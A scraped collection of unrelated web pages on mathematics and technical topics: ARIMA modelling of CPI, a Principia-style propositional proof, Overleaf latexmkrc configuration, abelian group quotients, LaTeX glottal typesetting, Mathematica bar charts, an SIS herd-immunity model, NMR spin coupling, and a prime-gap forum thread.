25 Journal of Inequalities and Applications 24 Siberian Mathematical Journal 24 Journal of Mathematical Sciences (New York) 24 Journal of the Australian Mathematical Society 24 Advanced Nonlinear Studies 23 Arkiv för Matematik 23 Proceedings of the Steklov Institute of Mathematics 22 Computational Methods and Function Theory 22 Frontiers of Mathematics in China 21 Bulletin of the Australian Mathematical Society 21 Rocky Mountain Journal of Mathematics 21 Revista Matemática Complutense 21 Annales Henri Poincaré 20 Inverse Problems 20 Ergodic Theory and Dynamical Systems 20 Abstract and Applied Analysis 20 Advances in Calculus of Variations 19 Journal of Geometry 19 Transformation Groups 19 Conformal Geometry and Dynamics 19 Journal of Pseudo-Differential Operators and Applications 19 Complex Analysis and its Synergies 18 Journal of the Mathematical Society of Japan 18 NoDEA. Nonlinear Differential Equations and Applications 18 Annali della Scuola Normale Superiore di Pisa. Classe di Scienze. Serie V 18 Banach Journal of Mathematical Analysis 18 Analysis & PDE ...and 415 more Journals
#### Cited in 61 Fields
2,770 Differential geometry (53-XX) 2,162 Partial differential equations (35-XX) 1,760 Several complex variables and analytic spaces (32-XX) 1,302 Harmonic analysis on Euclidean spaces (42-XX) 1,230 Global analysis, analysis on manifolds (58-XX) 783 Functional analysis (46-XX) 779 Functions of a complex variable (30-XX) 655 Operator theory (47-XX) 624 Calculus of variations and optimal control; optimization (49-XX) 381 Dynamical systems and ergodic theory (37-XX) 310 Algebraic geometry (14-XX) 296 Topological groups, Lie groups (22-XX) 286 Real functions (26-XX) 286 Abstract harmonic analysis (43-XX) 270 Potential theory (31-XX) 252 Measure and integration (28-XX) 250 Manifolds and cell complexes (57-XX) 240 Probability theory and stochastic processes (60-XX) 205 Convex and discrete geometry (52-XX) 171 Quantum theory (81-XX) 163 Fluid mechanics (76-XX) 153 Numerical analysis (65-XX) 135 Integral transforms, operational calculus (44-XX) 113 Ordinary differential equations (34-XX) 107 Number theory (11-XX) 95 Mechanics of deformable solids (74-XX) 92 Group theory and generalizations (20-XX) 84 Statistical mechanics, structure of matter (82-XX) 80 Information and communication theory, circuits (94-XX) 72 Combinatorics (05-XX) 68 Approximations and expansions (41-XX) 68 Geometry (51-XX) 68 Relativity and gravitational theory (83-XX) 61 General topology (54-XX) 55 Nonassociative rings and algebras (17-XX) 52 Special functions (33-XX) 47 Linear and multilinear algebra; matrix theory (15-XX) 46 Algebraic topology (55-XX) 42 Optics, electromagnetic theory (78-XX) 40 Difference and functional equations (39-XX) 39 Mechanics of particles and systems (70-XX) 34 Systems theory; control (93-XX) 33 Biology and other natural sciences (92-XX) 30 Integral equations (45-XX) 29 Commutative algebra (13-XX) 28 Statistics (62-XX) 27 Operations research, mathematical programming (90-XX) 24 Computer science (68-XX) 21 Classical thermodynamics, heat transfer (80-XX) 15 History and 
biography (01-XX) 12 General and overarching topics; collections (00-XX) 12 Field theory and polynomials (12-XX) 9 Associative rings and algebras (16-XX) 9 $$K$$-theory (19-XX) 8 Geophysics (86-XX) 7 Game theory, economics, finance, and other social and behavioral sciences (91-XX) 6 Mathematical logic and foundations (03-XX) 6 Category theory; homological algebra (18-XX) 6 Sequences, series, summability (40-XX) 6 Astronomy and astrophysics (85-XX) 1 General algebraic systems (08-XX)
|
|
# Fitting an ARIMA to CPI: How "valid" is this model I've fitted?
I'm trying to fit an ARIMA model to monthly CPI. So far, I've established stationarity using a DF test of the differenced CPI.
I have then proceeded to find the ACF and PACF of the differenced variable, which are as follows:
These are very peculiar to me (i.e. 3 irregular and significant lags after the first for both ACF and PACF). What can I make of this? Is this due to seasonality?
Regardless, I proceeded to fit the best ARIMA model using the auto.arima function in R, which picks the ARIMA model with the lowest information criterion. What I got was an ARIMA(2,1,2), as follows:
All coefficients are significant, and the BIC would be lowest here, so I don't see any problems. Please correct me if I'm wrong in saying that there is nothing wrong here.
I then proceeded to do some residual diagnostics, namely, doing a Box-Ljung test of the residuals with the following lags/dfs (not totally sure what this does) but anyways here are the results (and also the code I used):
So for df = 1, 4, and 5 (arbitrarily chosen; is there a better way to do this?) I get p > 0.05, which is what I am looking for. But for df = 36, 12, and 13 I get p < 0.05, which indicates that there are correlations among the residuals, suggesting that the ARIMA(2,1,2) is not a good model.
Finally, I've included an ACF of the residuals:
Again, this is not what I'd like to see as we see a few significant correlations here.
So, should I accept this model regardless of the fact that there were a few indications that it wasn't ideal (ACF, PACF, Box-Ljung test, and ACF of residuals)? What would you do next? Does the ACF or PACF indicate seasonality perhaps?
Any help or guidance is appreciated! I'm still new to ARIMA modelling.
• A 12-month seasonality in the monthly changes in CPI could reflect some mixture of (a) regular seasonal price rises and falls, e.g. before and after the holiday season, or (b) regular excise duty and indirect tax changes associated with an annual government budget Jun 9 at 17:12
You have some seasonality going on at period/frequency 12, and I don't know if auto.arima is taking that into account. You haven't posted your code.
Instead of using black box functions and not being totally certain about how they work, I would suggest writing down a few low-order SARIMA models, deriving their ACF and PACFs, and then try picking a model based on how its theoretical ACF/PACF fits your empirical ACF/PACF. If you need to check your work, R has a function ARMAacf that can help you.
• +1. auto.arima() in this case does not take the seasonality into account - ARIMA(2,1,2) is non-seasonal. I strongly suspect d.Y does not have a seasonality attribute, which needs to be encoded explicitly via ts(..., frequency=12). Plus, I personally do not recommend differencing the time series outside auto.arima(), which should be able to decide on the order of differencing by itself. It probably does a better job at model selection via information criteria than someone untrained (sorry) by looking at (P)ACF in the Box-Jenkins way. Mar 21 '18 at 4:17
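As an aside on what the Box-Ljung test is actually computing (the question flags uncertainty about this): it pools the first $h$ squared residual autocorrelations into one statistic, $Q = n(n+2)\sum_{k=1}^{h} \hat\rho_k^2/(n-k)$, which under the null of white-noise residuals is approximately chi-squared with $h-(p+q)$ degrees of freedom. A from-scratch Python sketch of the statistic (not the R code used in the question; function names are mine):

```python
def acf(x, k):
    """Sample autocorrelation of the series x at lag k (k >= 1)."""
    n = len(x)
    m = sum(x) / n
    xc = [v - m for v in x]
    denom = sum(v * v for v in xc)
    return sum(xc[i] * xc[i + k] for i in range(n - k)) / denom

def ljung_box_Q(x, h):
    """Box-Ljung statistic pooling lags 1..h; compare against a
    chi-squared distribution with h - (p + q) degrees of freedom
    when x is the residual series of a fitted ARMA(p, q)."""
    n = len(x)
    return n * (n + 2) * sum(acf(x, k) ** 2 / (n - k) for k in range(1, h + 1))

# A strongly alternating "residual" series has lag-1 autocorrelation
# near -1, so Q is huge even at h = 1.
bad_residuals = [1.0, -1.0] * 50
print(round(acf(bad_residuals, 1), 2))  # -0.99
```

A large Q (small p-value) at some h means the residuals are still autocorrelated at lags up to h, which is exactly the signal one would expect if a seasonal lag-12 structure is being missed.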
|
|
# Derivation of $p \supset (\thicksim p \supset q)$ in Gödel's Proof by Nagel/Newman
## The actual question
I am currently reading Gödel's Proof by Nagel and Newman. Chapter V deals with the formalization and consistency of a simple system of formal logic.
On page 50, after giving the rules of the system (see below), the authors state, without giving a proof, that
$p \supset (\thicksim p \supset q)$ is a theorem in the calculus
It seems like this should be relatively easy to prove, but I can't see how. I feel I may be missing something important, because I see no rules or axioms concerning negation (or conjunction, for that matter), though there probably should be some.
Can anyone give the complete proof?
## Rules of the formal calculus defined in the book
I call a formula any syntactically valid string, and a theorem any formula that can be derived from the axioms. The book does not always clearly make this distinction, so the rules I give here are somewhat rephrased.
The rules of the system are essentially defined as follows:
• Letters, and $\thicksim$, $\vee$, $\cdot$, $\supset$, $($, $)$ are the only allowed symbols in formulas;
• If $S$ and $S'$ are formulas, then $\thicksim (S)$, $(S) \vee (S')$, $(S) \cdot (S')$, and $(S) \supset (S')$ are formulas;
• Rule of substitution: in a theorem, one can uniformly replace a variable with a formula and obtain another theorem;
• Rule of detachment: if $S$ and $S\supset S'$ are theorems, $S'$ is a theorem;
• Axioms: the following formulas are theorems:
1. $(p\vee p)\supset p$,
2. $p\supset (p\vee q)$,
3. $(p\vee q)\supset (q\vee p)$, and
4. $(p\supset q)\supset ((p\vee r)\supset(q\vee r))$.
• See Alfred North Whitehead & Bertrand Russell, Principia Mathematica to *56 (2nd ed - 1927); page 12 for the def : $p \supset q \overset{def}{=} \lnot p \lor q$, and page 104 for the proof of *2.21 : $\lnot p \supset (p \supset q)$, by subst of $\lnot p$ in place of $p$ into Ax.2 [$p \supset (p \lor q)$] followed by *2.24 : $p \supset (\lnot p \supset q)$. – Mauro ALLEGRANZA Nov 5 '15 at 7:27
Their system seems to be missing a crucial link between '$\supset$', '$\vee$' and '$\sim$'. If they gave an additional axiom $(\sim\!p \vee q) \supset (p \supset q)$, or defined $\supset$ as $(\sim\!p \vee q)$, then the formula would be derivable. See this thread discussing the omission. (The first quoted assertion there is false, though: of course $p \supset p$ can be derived: it follows from axioms 2. (substituting $p$ for $q$) and 1., then using detachment.)
Nagel and Newman almost surely discuss the propositional calculus of Principia Mathematica (minus one of the book's axioms, which was found, years after the book was written, to be derivable from the other axioms). In the system of Principia Mathematica, and using the notational scheme you did, ⊃ doesn't actually exist as a primitive concept; rather, (p) ⊃ (q) abbreviates ~(p) ∨ (q).
I will switch to Polish notation in the following. I will also use $\vdash$ instead of saying something like "is a theorem".
The rules of the system remain the same, except
1. Only lower-case letters and N, A, K, and C are allowed in formulas.
2. If $\alpha$ and $\beta$ qualify as formulas, so do N$\alpha$, A$\alpha\beta$, K$\alpha\beta$, and C$\alpha\beta$.
3. The rule of detachment correspondingly becomes: if $\vdash \alpha$ and $\vdash$ AN$\alpha\beta$, then $\vdash \beta$.
The axioms also now correspondingly become:
1. ANAppp.
2. ANpApq.
3. ANApqAqp.
4. ANANpqANAprAqr.
Here's a parenthesized Polish notation proof generated by Prover9 with 'P' standing for $\vdash$:
% -------- Comments from original proof --------
% Proof 1 at 0.00 (+ 0.01) seconds.
% Length of proof is 13.
% Level of proof is 5.
% Maximum clause weight is 15.
% Given clauses 10.
1 P(A(N(x),A(N(N(x)),y))) # label(non_clause) # label(goal). [goal].
2 -P(A(N(x),y)) | -P(x) | P(y). [assumption].
3 P(A(N(A(x,x)),x)). [assumption].
4 P(A(N(x),A(x,y))). [assumption].
5 P(A(N(A(x,y)),A(y,x))). [assumption].
6 P(A(N(A(N(x),y)),A(N(A(x,z)),A(y,z)))). [assumption].
7 -P(A(N(c3),A(N(N(c3)),c4))). [deny(1)].
8 P(A(N(A(x,y)),A(A(x,z),y))). [hyper(2,a,6,a,b,4,a)].
9 P(A(N(A(A(x,x),y)),A(x,y))). [hyper(2,a,6,a,b,3,a)].
10 P(A(A(N(x),y),A(x,z))). [hyper(2,a,8,a,b,4,a)].
11 P(A(A(x,y),A(N(x),z))). [hyper(2,a,5,a,b,10,a)].
12 P(A(x,A(N(x),y))). [hyper(2,a,9,a,b,11,a)].
13 \$F. [resolve(12,a,7,a)].
============================== end of proof ==========================
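A machine proof is one thing; it can also be reassuring to check the formula semantically. Under the Principia definition $p \supset q \overset{def}{=} \thicksim p \vee q$, a brute-force truth table confirms that $p \supset (\thicksim p \supset q)$ holds in every row. A small Python sketch (names are mine; this checks validity rather than derivability, though the two coincide because this calculus is complete):

```python
from itertools import product

def implies(a, b):
    # Principia-style material implication: p > q is defined as (~p) v q
    return (not a) or b

def tautology(f, nvars):
    # True iff f holds under every assignment of truth values
    return all(f(*row) for row in product([False, True], repeat=nvars))

print(tautology(lambda p, q: implies(p, implies(not p, q)), 2))  # True
print(tautology(lambda p: implies(p, p), 1))                     # True
print(tautology(lambda p, q: implies(p, q), 2))                  # False
```

The last line is just a sanity check that the checker can reject a non-theorem.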
|
|
Hands up if you've heard of a latexmkrc file? Now keep your hands up if you know what it does. Now keep your hands up if you've ever written your own. Anyone with their hands still up—you probably don't need to read the rest of this post.

Why the interest in latexmkrc? We've recently had a number of users get in touch to ask how to do certain things with Overleaf, to which our answer has begun: "Firstly, create a custom latexmkrc file in your project...". Given that this isn't the most intuitive part of LaTeX, and documentation on the web (and examples in particular) is quite sparse, we thought we'd explore it here in a bit more detail.

> @FancyWriter yes - you can set command options by creating a custom latexmkrc file in a project, with $pdflatex = 'pdflatex --shell-escape'; — Overleaf (@overleaf) June 15, 2014

## What is a latexmkrc file?

If you've never seen it before, a latexmkrc file is a configuration/initialization (RC) file for the Latexmk package. Latexmk is used by Overleaf to control the compilation of your source LaTeX document into the final typeset PDF file. By using a customized configuration file called latexmkrc, you can override the default compilation commands and have Overleaf compile your document in a special way.

## Why would I want to use a latexmkrc file?

Well, as an example, did you know that, by default, all the dates and times in a PDF compiled on Overleaf are those of the server's timezone? What if instead you'd like to use your local date/time? To display the date/time local to your timezone, you can change the TZ (timezone) environment variable using a custom latexmkrc file:

1. In your project editor window, click on "Add file" at the top of the project sidebar.
2. Select "Blank file", and name the file latexmkrc.
3. Add the following line to the file latexmkrc: $ENV{'TZ'}='Canada/Central'; (or whichever timezone is required; here's a list of supported time zones for reference).

Dates and times (e.g. \today and \currenttime from the datetime package) in the PDF should then give values local to the specified time zone.

## Where can I find more examples of latexmkrc commands?

As a start, check out the following examples from our help pages:

- Can I run plain TeX on Overleaf?
- Does Overleaf support pTeX?
- I have a lot of .cls, .sty, .bst files, and I want to put them in a folder to keep my project uncluttered. But my project is not finding them to compile correctly.
- How can I make the xr package work on Overleaf?
- How do I make \today display the date according to my time zone? (that example is re-used above)

If those don't help, please feel free to contact us or try the popular TeX StackExchange and LaTeXCommunity forums.
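For reference, the two overrides mentioned in this post can live side by side in one latexmkrc. This is only a sketch; the timezone value and the shell-escape flag are just the examples quoted above, so substitute your own:

```perl
# latexmkrc -- read by Latexmk at the start of every compile.

# Use local (Canada/Central) time for \today, \currenttime and PDF metadata.
$ENV{'TZ'} = 'Canada/Central';

# Compile with pdflatex, allowing packages that shell out (e.g. minted).
$pdflatex = 'pdflatex --shell-escape %O %S';
```

(%O and %S are Latexmk's placeholders for the command-line options and the source file.)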
|
|
# Abelian Groups
Can you check the following statements and their proofs?
Statement 1. Let $A, A_1, A_2$ be abelian groups with $$A = A_1\oplus A_2.$$ Then $$A/A_1=A_2.$$ Proof: $$A=\{(a_1, a_2)|a_1\in A_1,~~a_2\in A_2\}.$$ $$x = (x_1, x_2)\sim y = (y_1, y_2)\Leftrightarrow x-y\in A_1 \Leftrightarrow x_2=y_2.$$ So the homomorphism $\varphi : A/A_1\to A_2$ such that $$\varphi(a_1, a_2) = a_2$$ is an isomorphism. $\blacksquare$
Statement 2. Let $A\supset B$ be abelian groups; then $$A = B\oplus A/B$$
Proof: $A\supset B$, therefore $$\exists C\subset A: A=B\oplus C.$$ And from first statement: $$C = A/B.$$ $\blacksquare$
Thanks.
It's a bad sign in a proof when you have a statement with no attempt to justify it. Why does $A \supset B$ imply the existence of a $C$ such that $A=B \oplus C$? – Chris Eagle Nov 23 '11 at 18:19
It should be true, at least for finitely generated abelian groups, that any quotient will appear as a subgroup. But Prof Magidin's example shows that you can't expect this to give a direct sum decomposition. – Dylan Moreland Nov 23 '11 at 18:57
(2⊕4)/(1⊕2) ≅ 2⊕2 ≠ 4, so you have to make sure to use the right copy of A1 in A. – Jack Schmidt Nov 23 '11 at 20:43
First statement: you don't have equality between $A/A_1$ and $A_2$, you have isomorphism.
The second statement: you cannot hope for equality in general, though you may hope for isomorphism. However, Statement 2 is false: take $A$ to be cyclic of order $4$, $B$ to be the unique cyclic subgroup of order $2$. Then $A/B$ is cyclic of order $2$, so your assertion is that the cyclic group of order $4$ (namely, $A$) is isomorphic to a direct sum of a cyclic group of order $2$ (namely $B$) and another cyclic group of order $2$ (namely, $A/B$). This is false.
The error lies in the assertion that there must exist a $C$ contained in $A$ such that $A=B\oplus C$. There is no warrant for this assertion, as you can see with the example above.
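The counterexample is easy to verify mechanically: $\mathbb Z/4$ contains an element of order $4$, while every element of $\mathbb Z/2 \oplus \mathbb Z/2$ has order at most $2$, so the two groups cannot be isomorphic. A quick Python sketch (the helper names are mine):

```python
from math import gcd

def order_in_Zn(a, n):
    # additive order of a in the cyclic group Z/nZ
    return n // gcd(a, n)

def lcm(a, b):
    return a * b // gcd(a, b)

# Z/4Z contains an element of order 4 ...
max_order_Z4 = max(order_in_Zn(a, 4) for a in range(4))
# ... but every element of (Z/2Z) + (Z/2Z) has order at most 2
max_order_Klein = max(lcm(order_in_Zn(a, 2), order_in_Zn(b, 2))
                      for a in range(2) for b in range(2))
print(max_order_Z4, max_order_Klein)  # 4 2
```

Since element orders are preserved by isomorphisms, the mismatch settles it.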
|
|
# Yan-nhaŋu glottals and LaTeX
This post will probably be of interest only to the (rather small number of) people who use LaTeX to typeset Yolŋu Matha. Yolŋu Matha uses a symbol for the glottal stop which is basically an apostrophe ‘ without smart quotes turned on (it dates from the days before smart quotes). These days there is a small movement amongst Yolŋu typesetters to distinguish quotation marks from the glottal. This turns out to be surprisingly hard to do in LaTeX. Prime symbols won’t work, the verbatim environment doesn’t work, the IPA primary stress mark doesn’t work. What does look ok, however, is the tipa vertical bar accent with some space fudging.
{\textipa{\hspace{-1.5pt}\textvbaraccent{}\hspace{-1.5pt}}}
to be precise.
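If you use this regularly, it may be worth wrapping the space-fudged accent in a macro so the source stays readable. A sketch for the preamble (the macro name \glottal is my own invention; it assumes the tipa package is loaded):

```latex
\usepackage{tipa}

% Vertical-bar glottal mark, visually distinct from curly quotes.
\newcommand{\glottal}{%
  \textipa{\hspace{-1.5pt}\textvbaraccent{}\hspace{-1.5pt}}%
}
```

Then a glottal stop in running text is just \glottal{}, and the fudge factors can be tuned in one place.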
### 4 responses to “Yan-nhaŋu glottals and LaTeX”
1. I assume that the reason \verb doesn’t work is that it switches to the monospaced font?
If you use XeLaTeX, then you can use the fontspec package, and refrain from using the Mapping=tex-text option; this will cause straight vertical apostrophes not to turn into curved apostrophes/right single quotes. On the other hand, doing this means that you’d have to use “smart” quotes in your source file whenever you want them to appear, so if you’re used to using and ‘, it could be a bit of a pain.
Alternatively, if you use the Linux Libertine font, you can use the command \\useTextGlyph{fxl}{quotesingle} to specify the vertical apostrophe.
2. Oops; there’s an extra backslash in there.
3. “so if you’re used to using and ‘, it could be a bit of a pain”
Unless of course you’re using a Mac with one of the English keyboards, in which case “” are available as Opt+[ and Opt+Shift+[, and ‘’ are available as Opt+] and Opt+Shift+].
I highly recommend people avoid using the Mapping=tex-text option because it defeats one of the major purposes of XeTeX which is to use Unicode consistently and properly for encoding text. The tex-text mapping is really only meant as a backwards compatibility option for older documents. Once you have a reliable method of inputting “” and ‘’, it’s easy enough to search and replace all instances of ` and ‘ in your document.
Also, in my humble opinion, writing systems which use quotes as orthographic symbols (rather than punctuation) should avoid using them as quotation marks. Instead there’s the much less ambiguous «» and ‹› for quoting.
4. XeLaTeX and the learner’s guide document don’t coexist very happily for some reason. I need to spend a bit of time with TeXShop and the compilation engines. There’s something about epsfig that’s working strangely (or rather not working). There’s also a backwards compatibility issue in that I use miktex and winedt on my pc (I find texshell pretty hard to use) and winedt isn’t unicode compliant.
The problem is using the straight quote for the glottal. If they used the single curly quote there’d be no problem; we could use that for glottals and double quotation marks for speech.
|
|
Add an Element to a List - Maple Programming Help
Add an Element to a List
Description Add an element to a list.
Enter a list.
> $\left[{1}{,}{-2}{,}{6}{,}{3}\right]$
$\left[{1}{,}{-}{2}{,}{6}{,}{3}\right]$ (1)
Specify a new element, and then add the new element to the list.
> $\left[\mathrm{op}\left(\left[{1}{,}{-}{2}{,}{6}{,}{3}\right]\right){,}{3}\right]$
$\left[{1}{,}{-}{2}{,}{6}{,}{3}{,}{3}\right]$ (2)
Commands Used
|
|
EXPLORABLES
This explorable illustrates the mechanism of herd immunity. When an infectious disease spreads in a population, an individual can be protected by a vaccine that delivers immunity. But there's a greater good. Immunization not only protects the individual directly. The immunized person will also never transmit the disease to others, effectively reducing the likelihood that the disease can proliferate in the population. Because of this, a disease can be eradicated even if not the entire population is immunized. This population-wide effect is known as herd immunity.
Press Play and keep on reading....
## This is how it works
This explorable is actually a set of four similar explorables, all of which model the spread of a disease in a population with $$N$$ individuals. An individual can be Susceptible, which means the person can acquire the disease and become Infected. Once infected, the person can transmit the disease to other susceptibles. An infected individual remains infectious for some time, recovers subsequently, and becomes susceptible again.
This model is known as the SIS-model, one of the simplest dynamical models for infectious disease dynamics. If, on average, an infected person transmits to more than one other person during the infectious period, the disease will reach an endemic state in the population in which new infections and recoveries balance. You may also want to check the explorables Critical HEXersize and Epidemonic for more information on epidemic models.
Vaccination is modelled this way: All individuals can spontaneously decide to vaccinate at a certain rate such that in equilibrium a fraction $$P$$ of the population is vaccinated.
Both vaccine uptake and the transmissibility of the disease can be controlled with sliders.
The system is initially fully susceptible with a few infected individuals randomly scattered into the population.
### Model 1: The mixed population
In this version of the SIS-model, individuals move around randomly and interact only with other individuals in their proximity. Transmissions occur by face-to-face contacts.
When you press play, the number of infected people will increase until a dynamic equilibrium is reached. Now turn the vaccine uptake up until you find the point at which the disease will be eradicated. The higher the transmissibility, the higher the critical threshold for the vaccine uptake.
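The critical point you find with the slider has a simple well-mixed approximation: with transmission rate $\beta$, recovery rate $\gamma$ and vaccinated fraction $P$, the disease dies out once $P > 1 - \gamma/\beta = 1 - 1/R_0$, which is why higher transmissibility pushes the threshold up. A deterministic Python caricature of Model 1 (parameter names are mine; this is not the explorable's actual code):

```python
def sis_prevalence(beta, gamma, p_vacc, t_max=200.0, dt=0.01):
    """Endemic infected fraction of a well-mixed SIS model in which a
    fixed fraction p_vacc of the population is vaccinated (never infected).
    Forward-Euler integration; beta = transmission rate, gamma = recovery rate."""
    i = 0.01                    # small seed of infecteds
    s = 1.0 - p_vacc - i        # everyone else starts susceptible
    for _ in range(int(t_max / dt)):
        flow = (beta * s * i - gamma * i) * dt   # net S -> I flow this step
        s -= flow
        i += flow
    return i

# R0 = beta/gamma = 3, so the herd-immunity threshold is 1 - 1/3, about 0.67
print(sis_prevalence(0.3, 0.1, 0.0) > 0.5)   # endemic without vaccination: True
print(sis_prevalence(0.3, 0.1, 0.8) < 1e-3)  # eradicated above threshold: True
```

With $R_0 = 3$, zero uptake settles near an endemic level of $2/3$ infected, while at $P = 0.8$ the seed dies out, mirroring what the slider experiment shows.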
### Model 2: The static network model
In this model, individuals are stationary and linked, forming a heterogeneous network in which some individuals possess more links than others. The disease is transmitted only across links in the network, so nodes with more connections are more likely to become infected and to spread the disease.
As you increase the vaccine uptake, you should see that near the critical point pockets of infections exist, whereas other areas in the network remain disease free.
### Model 3: The dynamic network model
In this model, the population is also connected by a network of links. Transmissions only occur between linked individuals. However, these links change over time. Individuals may rearrange their connections, cut old ones and establish new ones.
This particular "rewiring" generates little groups that are densely connected and individuals move between them.
### Model 4: The spatial lattice model
This model is a bit more abstract and has been used to investigate spatial aspects of disease dynamics. Here we have a $$40\times 40$$ square lattice. Every lattice site can be in one of the three states S, I and V. Transmissions only occur between neighboring lattice sites.
|
|
# Nmr (Page 5/6)
Page 5 / 6
The difference in chemical shift labeled J is known as the coupling constant. If two nuclei are coupled to each other, the coupling constants will be the same. For example, in the case of 1,1-dibromo-2,2-dichloroethane, the two peaks that make up the doublet due to the ${\text{CCl}}_{2}$ will be split by exactly the same distance as the two peaks that make up the doublet due to the ${\text{CBr}}_{2}$ group. In a complex spectrum, this allows us to identify which peaks are coupled to each other. Peaks that are coupled to each other will most likely arise because the H atoms are on adjacent (or nearby) carbon atoms.
We need to consider a couple of other cases in order to have enough information on coupling patterns to understand common problems. There are cases where there is more than one proton on adjacent carbon atoms.
Let us first consider the case where one or more protons on one carbon atom (let's call it Carbon A) "see" two identical protons on a neighboring carbon atom (called Carbon B). What types of magnetic fields will be seen by the protons on Carbon A? To sort this out, we need to consider the different possible spin combinations of the protons on Carbon B. This is done purely by probability. There are four possibilities:
These can be described by the spin numbers: (+1/2, +1/2), (+1/2, -1/2), (-1/2, +1/2), (-1/2, -1/2). It should be easy to see that the energies of the two combinations (+1/2, -1/2) and (-1/2, +1/2) will be equal. We can order these possibilities according to their expected energies in the presence of a strong external field:
The splitting of the protons on Carbon A will be into three signals in a 1:2:1 ratio, the 2 arising because that energy level is twice as probable.
The case for three protons on an adjacent carbon atom is worked out in a similar fashion. Again, the splitting seen by the protons on Carbon A attached to Carbon B (a methyl group) would be as follows:
There are 8 possible combinations of spin states, which divide into a 1:3:3:1 ratio: either all spins are up, two up and one down, two down and one up, or all down. A proton or protons on a carbon atom adjacent to a methyl group will therefore be split into a quartet with area ratios of 1:3:3:1.
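The 1:2:1 and 1:3:3:1 ratios are simply rows of Pascal's triangle: coupling to $n$ equivalent spin-1/2 neighbors splits a signal into $n+1$ lines with relative intensities given by the binomial coefficients. A one-function Python sketch:

```python
from math import comb  # Python 3.8+

def multiplet(n):
    """Relative line intensities for coupling to n equivalent protons."""
    return [comb(n, k) for k in range(n + 1)]

print(multiplet(1))  # [1, 1]        doublet
print(multiplet(2))  # [1, 2, 1]     triplet
print(multiplet(3))  # [1, 3, 3, 1]  quartet
```

Each coefficient counts how many of the $2^n$ equally probable spin combinations produce the same total field, which is exactly the counting argument made above.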
Ethyl
If we have a ${\text{CH}}_{3}{\text{CH}}_{2}^{-}$ group, as in chloroethane, we would expect to see two peaks in a ratio of 3:2. The methyl group signal will be split into a triplet (with relative areas of 1:2:1) by coupling to the methylene protons. The methylene protons are split into a quartet (with relative areas of 1:3:3:1) by coupling to the methyl protons. Therefore, we expect the spectrum of an ethyl group to look something like…
Notice that the chemical shift of a peak split by coupling is defined as the center of the peak pattern. As mentioned earlier, the distance between the peaks of the ${\text{CH}}_{3}$ group (the coupling constant) will be the same as the distance between the peaks of the ${\text{CH}}_{2}$ group. Also note that the total intensity of the peaks due to the ${\text{CH}}_{3}$ group is 1.5 times the size of the total intensity for the peaks of the ${\text{CH}}_{2}$ group.
|
|
# Positioning ChartLabels in a horizontal stacked BarChart
I can create a BarChart with horizontal bars (using BarOrigin -> Left) and Mathematica will automatically position the ChartLabels on the left hand side:
data1D = RandomReal[{1, 10}, 10];
labels = DictionaryLookup["D*", 10];
BarChart[data1D, BarOrigin -> Left, ChartLabels -> labels,
BaseStyle -> {FontFamily -> "Calibri", 14}]
However, if I want to plot a stacked chart in the same way, the ChartLabels appear below the bars:
data2D = RandomReal[{1, 10}, {10, 2}];
BarChart[data2D, BarOrigin -> Left, ChartLayout -> "Stacked",
ChartLabels -> {labels, None},
BaseStyle -> {FontFamily -> "Calibri", 14}]
How can I get the labels for the stacked chart to appear as they do in the simple chart?
-
ChartLabels -> {Placed[labels, Axis], None}
thank you! I looked at Placed but didn't see Axis in the docs. Accepting immediately as this is 100% what I wanted. – Simon Woods Nov 23 '12 at 13:40
Simon, thank you for the accept. I have been struggling with option combinations BarOrigin/Joined in BarCharts/Histograms; somehow Joined->True works properly only if BarOrigin->Bottom (perhaps due to some corruption in my mma installation). Do you mind checking if Joined->True works as expected in your example? – kglr Nov 23 '12 at 15:56
I can confirm that Joined->True does not work properly on my example (MMA 8.04). – Simon Woods Nov 23 '12 at 19:26
|
|
mersenneforum.org Where to find Prime Gap lists?
2019-12-21, 10:02 #23
robert44444uk
Jun 2003
Oxford, UK
2·7·137 Posts
Quote:
Originally Posted by storm5510 I did the code test earlier. I stripped the code down to what was necessary, compiled it and ran the test. It did far better than I was expecting. Check out the screen capture. The floating-point numbers and the ends are start time and end time. Take away some digits at both ends and use what is near the decimal point. 25.44 seconds.
So danaj's suite of prime functions in perl Math::Prime::Util is 25 times faster - time to change to perl !!
If it's any help, I am not computer literate and did not start on Perl before my 65th birthday
2019-12-21, 10:03 #24
robert44444uk
Jun 2003
Oxford, UK
3576₈ Posts
Quote:
Originally Posted by sweety439 Well....
Well?
2019-12-21, 12:22 #25
storm5510
Random Account
Aug 2009
U.S.A.
2²×11×41 Posts
Quote:
Originally Posted by robert44444uk So danaj's suite of prime functions in perl Math::Prime::Util is 25 times faster - time to change to perl !! If its any help I am not computer literate and did not start on perl before my 65th birthday
Perl. Seriously, I doubt I could learn enough of it to use it. Then again, perhaps I could. I found their site on the web. It has what they call ActiveState Perl. Another is Strawberry. I am not sure which to look at.
Computer literate: after 32 years of it, I like to think I am. I have seen the evolution to where it is now. I never buy a new machine from a shelf. I build my own. None has ever given me any problems.
2019-12-22, 11:12 #26
robert44444uk
Jun 2003
Oxford, UK
2×7×137 Posts
I use Strawberry Perl, which is the perl environment for Windows.
2019-12-22, 13:56 #27
storm5510
Random Account
Aug 2009
U.S.A.
2²·11·41 Posts
Quote:
Originally Posted by robert44444uk I use Strawberry Perl, which is the perl environment for Windows.
Thanks. I will give it a look.
Quote:
Originally Posted by robert44444uk ...My best guess is that the smaller of the two primes that make up the first instance gap of length exactly 1,432 is less than 100,000,000,000,000,000,000.
I have been running some of these with what I wrote. I started at 5e19. All the gaps I am seeing are < 400.
2019-12-22, 15:39 #28
robert44444uk
Jun 2003
Oxford, UK
2·7·137 Posts
Quote:
Originally Posted by storm5510 Thanks. I will give it a look. I have been running some of these with what I wrote. I started at 5e19. All the gaps I am seeing are < 400.
The first few gaps >400; the 1st column is the nth gap after 5e19. Time elapsed for the first million gaps was 100 secs. There were no gaps >= 600. The first gap at the 600 level is that following 50000000000211284873
Code:
8645 50000000000000387671 50000000000000388119 448
34553 50000000000001565667 50000000000001566087 420
49325 50000000000002234033 50000000000002234463 430
62247 50000000000002821217 50000000000002821617 400
77934 50000000000003533853 50000000000003534279 426
78922 50000000000003579203 50000000000003579723 520
89175 50000000000004045967 50000000000004046373 406
103428 50000000000004694897 50000000000004695321 424
107476 50000000000004883687 50000000000004884101 414
108772 50000000000004941917 50000000000004942409 492
113676 50000000000005167523 50000000000005167941 418
132173 50000000000006006213 50000000000006006681 468
154035 50000000000006985029 50000000000006985449 420
164841 50000000000007476039 50000000000007476449 410
174248 50000000000007904219 50000000000007904621 402
177893 50000000000008066247 50000000000008066661 414
182013 50000000000008251143 50000000000008251547 404
235214 50000000000010665303 50000000000010665707 404
242998 50000000000011017149 50000000000011017557 408
